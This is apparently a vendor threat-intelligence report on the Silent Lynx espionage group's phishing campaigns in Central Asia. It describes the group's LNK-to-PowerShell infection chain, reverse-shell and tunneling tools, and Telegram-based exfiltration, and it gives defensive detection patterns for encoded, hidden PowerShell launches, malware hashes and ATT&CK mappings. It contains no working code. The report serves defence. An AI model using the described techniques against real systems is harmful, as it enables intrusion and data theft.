Highlights of Our CISO Dinner
Upgrading struggling vulnerability management programs to Threat Exposure Management, with Host, CISO Al Lindseth formerly from Plains All American Pipeline and PWC - 6 minute podcast
Silent Lynx, an Advanced Persistent Threat (APT) group also known as YoroTrooper, Sturgeon Phisher, Cavalry Werewolf, and ShadowSilk, has been conducting sophisticated espionage campaigns across Central Asia since late 2024. The threat actor targets government entities, diplomatic missions, think-tanks, financial institutions, mining companies, and transport and communications infrastructure primarily in Tajikistan, Kazakhstan, Kyrgyzstan, Turkmenistan, and Uzbekistan, with additional activity observed in Russia, Azerbaijan, and China.
Operating under the campaign designation “Operation Peek-a-Baku,” Silent Lynx leverages phishing campaigns themed around regional diplomatic summits and strategic cooperation meetings to deliver malicious RAR or ZIP attachments containing LNK shortcuts or ISO files. These attachments deploy PowerShell-based loaders and custom implants including Silent Loader, LAPLAS, and SilentSweeper malware variants. The APT group utilizes legitimate services such as GitHub for payload hosting, Ligolo-ng for encrypted tunneling, and Telegram bots for command-and-control operations, effectively blending malicious traffic with normal network activity. Attribution analysis suggests the threat actor may operate from Kazakhstan, with significant operational overlaps with the YoroTrooper espionage group indicating potential shared resources or collaboration between these Advanced Persistent Threat entities.
Silent Lynx represents an Advanced Persistent Threat group conducting cyber-espionage campaigns across Central Asia since late 2024, with primary focus on governmental, diplomatic, financial, and strategic infrastructure sectors. The Operation Peek-a-Baku campaign specifically targets intelligence collection related to sensitive political and economic matters, particularly information concerning regional initiatives under the UN Special Programme for the Economies of Central Asia (SPECA). Attribution analysis points to Kazakhstan as the potential operational base for this APT group, with significant tooling and objective overlaps observed with the YoroTrooper espionage group, suggesting either shared resources or direct collaboration between these Advanced Persistent Threat actors.
The threat actor’s targeting methodology demonstrates high selectivity aligned with key geopolitical events affecting Central Asia. Silent Lynx crafts phishing lures referencing diplomatic summits and strategic cooperation meetings in major regional capitals including Dushanbe, Astana, and Baku. Email attachments are themed around policy discussions and infrastructure development topics such as mining operations and transport corridors, including specific references to the China-Tajikistan Highway project. These spear-phishing campaigns utilize RAR or ZIP compressed archives containing malicious LNK shortcuts or ISO files designed to deliver PowerShell stagers concealed behind decoy documents. While the social-engineering content maintains contextual relevance to regional affairs, language inconsistencies in filenames suggest either automated generation or non-native Russian language proficiency among the APT operators.
Silent Lynx employs a sophisticated multi-stage infection chain combining custom malware with open-source utilities to establish persistent access to compromised systems. The attack sequence initiates with an LNK shortcut that executes a Base64-encoded PowerShell script hosted on GitHub repositories, which subsequently downloads and executes malicious implants. The APT group’s custom malware arsenal includes Silent Loader, a C++ loader deploying PowerShell payloads; LAPLAS, a C++ reverse shell utilizing TCP/TLS protocols for encrypted communications; and SilentSweeper, a .NET implant providing remote access capabilities. To maintain persistent access and conceal command-and-control activity, Silent Lynx leverages Ligolo-ng, an open-source tunneling tool that enables encrypted command and data traffic to flow through compromised hosts, effectively evading traditional network detection mechanisms.
The Silent Lynx APT group maintains command-and-control infrastructure distributed across multiple countries, with C2 servers identified in Russia and the Netherlands. Certain malware variants incorporate Telegram bot functionality with hardcoded authentication tokens for issuing commands and exfiltrating sensitive data, a tactic that enhances operational stealth by leveraging legitimate messaging platforms but has also exposed operational details during security analysis. The threat actor demonstrates moderate technical capability characterized by persistent reuse of infrastructure elements, reliance on open-source tooling, and encoding techniques that balance implementation simplicity with effectiveness against conventional security defenses. This operational pattern indicates an APT group prioritizing sustained intelligence collection over advanced evasion, with ongoing activity suggesting continued focus on Central Asian geopolitical and economic intelligence gathering.
Organizations should enforce PowerShell Constrained Language Mode for non-administrator users to limit script execution capabilities and prevent malicious PowerShell-based attacks commonly employed by the Silent Lynx APT group. Enable PowerShell Script Block Logging and Module Logging to capture Event IDs 4103 and 4104, which record detailed information about encoded commands and script execution. This logging capability is essential for detecting Base64-encoded PowerShell commands utilized in Silent Lynx infection chains and provides critical forensic evidence for incident response investigations.
Configure email gateway security controls to quarantine RAR archives, ISO disk images, and LNK shortcut files, which represent the primary delivery mechanisms for Silent Lynx phishing campaigns targeting Central Asian organizations. Implement sandbox detonation technology to analyze compressed or password-protected archives in isolated environments before delivery to end users. This preventive measure effectively neutralizes the initial access vector employed by the APT group while minimizing disruption to legitimate business communications.
Deploy detection mechanisms to identify suspicious powershell.exe process instances utilizing command-line arguments such as -EncodedCommand, -nop (NoProfile), or -w hidden (WindowStyle hidden). Configure security monitoring to generate alerts when PowerShell execution chains originate from parent processes including explorer.exe, winword.exe, or Outlook-related processes, as these represent common indicators of malicious LNK or document-based exploitation. This behavioral detection approach enables early identification of Silent Lynx infection attempts during the initial execution phase.
Block network communications to known Silent Lynx command-and-control IP addresses and malicious domains identified in threat intelligence. Deploy detection capabilities to identify outbound connections to GitHub raw content URLs used as payload hosting infrastructure by the APT group. Monitor network traffic for Ligolo-ng tunneling behavior, characterized by unusual, persistent TLS or TCP connections to unfamiliar IP addresses on non-standard ports. This network-layer defense provides visibility into command-and-control communications and data exfiltration attempts associated with Silent Lynx operations.
Implement Windows AppLocker or Windows Defender Application Control (WDAC) policies to prevent execution of unauthorized binaries and scripts from user-writable directories. Application allowlisting provides robust protection against Silent Loader, LAPLAS, and SilentSweeper malware variants by blocking execution of malicious implants deployed during Silent Lynx attack sequences. This preventive control significantly reduces the attack surface available to Advanced Persistent Threat groups targeting Windows-based infrastructure.
The following IP addresses represent command-and-control infrastructure utilized by the Silent Lynx APT group in Operation Peek-a-Baku espionage campaigns:
Silent Lynx command-and-control operations leverage the following domain names masquerading as legitimate Microsoft update services:
Active payload distribution infrastructure identified in Silent Lynx campaigns:
The following SHA256 hashes correspond to Silent Loader, LAPLAS, SilentSweeper malware variants, malicious LNK shortcuts, PowerShell loaders, and associated files utilized in Silent Lynx APT operations:
ef627bad812c25a665e886044217371f9e817770b892f65cff5877b02458374e, 5b58133de33e818e082a5661d151326bce5eeddea0ef4d860024c1dbb9f94639, 5bae9c364ee4f89af83e1c7d3d6ee93e7f2ea7bd72f9da47d78a88ab5cfbd5d4, 72a36e1da800b5acec485ba8fa603cd2713de4ecc78498fcb5d306fc3e448c7b, 5e3533df6aa40e86063dd0c9d1cd235f4523d8a67d864aa958403d7b3273eaaf, b58f672e7fe22b3a41b507211480c660003823f814d58c04334ca9b7cdd01f92, ae51aef21ea4b422ef0c7eb025356e45d1ce405d66afbb3f6479d10d0600bcfd, 0bce0e213690120afc94b53390d93a8874562de5ddcc5511c7b9b9d95cf8a15d, 821f1ee371482bfa9b5ff1aff33705ed16e0147a9375d7a9969974c43b9e16e8, 262f9c63c46a0c20d1feecbd0cad75dcb8f731aa5982fef47d2a87217ecda45b, 123901fa1f91f68dacd9ec972e2137be7e1586f69e419fc12d82ab362ace0ba9, 6cb54ec004ff8b311e73ef8a8f69b8dd043b7b84c5499f4c6d79d462cea941d8, 97969978799100c7be211b9bf8a152bbd826ba6cb55377284537b381a4814216, 9de8bbc961ff450332f40935b739d6d546f4b2abf45aec713e86b37b0799526d, b5a4f459bdff7947f27474840062cfce14ee2b1a0ef84da100679bc4aa2fcf77, ffda4f894ca784ce34386c52b18d61c399eb2fc8c9af721933a5de1a8fff9e1b, 2c8efe6eb9f02bf003d489e846111ef3c6cab32168e6f02af7396e93938118dd, 1531f13142fc0ebfb7b406d99a02ec6441fc9e40725fe2d2ac11119780995cd3, 67cf0e32ad30a594442be87a99882fa4ac86494994eee23bdd21337adb804d3f, 036a60aa2c62c8a9be89a2060e4300476aef1af2fd4d3dd8cac1bb286c520959, 32035c9d3b81ad72913f8db42038fcf6d95b51d4d84208067fe22cf6323f133c, a639a9043334dcd95e7cd239f8816851517ebb3850c6066a4f64ac39281242a3, a83a8eb3b522c4517b8512f7f4e9335485fd5684b8653cde7f3b9b65c432fa81, 26aca51d555a0ea6d80715d8c6a9f49fea158dee11631735e16ea75c443a5802, 303f03ae338fddfe77c6afab496ea5c3593d7831571ce697e2253d4b6ca8a69a, 40d4d7b0bc47b1d30167dd7fc9bd6bd34d99b8e0ae2c4537f94716e58e7a5aeb, b0ac155b99bc5cf17ecfd8d3c26037456bc59643344a3a30a92e2c71c4c6ce8d, b87712a6eea5310319043414eabe69462e12738d4f460e66a59c3acb5f30e32e
Silent Lynx APT operations employ Initial Access tactics including Phishing (T1566) and specifically Spearphishing Attachment (T1566.001) to deliver malicious RAR and ZIP archives containing malware to target organizations. The threat actor utilizes User Execution (T1204) techniques requiring victims to interact with malicious files, followed by execution through Command and Scripting Interpreter (T1059) methods including PowerShell (T1059.001) and Visual Basic (T1059.005) scripting languages to establish initial footholds in compromised environments.
The APT group establishes persistence through Boot or Logon Autostart Execution (T1547) mechanisms, specifically leveraging Shortcut Modification (T1547.009) techniques to maintain access across system reboots. Silent Lynx also employs Scheduled Task/Job (T1053) creation, including Scheduled Task (T1053.005) implementations, to ensure persistent execution of malicious payloads and maintain long-term access to compromised Central Asian infrastructure.
Silent Lynx demonstrates sophisticated Defense Evasion capabilities through Obfuscated Files or Information (T1027) techniques, specifically utilizing Encrypted/Encoded File (T1027.013) methods to conceal malicious PowerShell scripts and payloads. The threat actor implements Masquerading (T1036) techniques to disguise malicious files and processes as legitimate system components, reducing detection probability by security monitoring tools deployed in target environments.
The APT group maintains command-and-control communications through Application Layer Protocol (T1071) methods, specifically Web Protocols (T1071.001) for HTTP/HTTPS-based communications. Silent Lynx utilizes Protocol Tunneling (T1572) via Ligolo-ng to encrypt command traffic and employs Proxy (T1090) techniques to obfuscate the true origin of command-and-control communications. The group also leverages Non-Application Layer Protocol (T1095) methods for direct TCP/TLS connections established by the LAPLAS malware variant.
Silent Lynx conducts data exfiltration through Exfiltration Over C2 Channel (T1041) techniques, utilizing established command-and-control infrastructure to extract sensitive intelligence from compromised organizations. The threat actor also employs Exfiltration Over Web Service (T1567) methods, specifically leveraging Telegram messaging platform functionality embedded in certain malware variants to exfiltrate collected data while blending exfiltration traffic with legitimate communications.
The APT group demonstrates technical proficiency through Native API (T1106) utilization for low-level Windows system interactions that evade higher-level security monitoring. Silent Lynx operations involve execution of Malicious File (T1204.002) and Malicious Link (T1204.001) components delivered through phishing campaigns, representing the critical user interaction phase required for successful compromise of target systems in Central Asian espionage operations.
Report Generated: November 6, 2025
Threat Level: Red
Get through updates and upcoming events, and more directly in your inbox
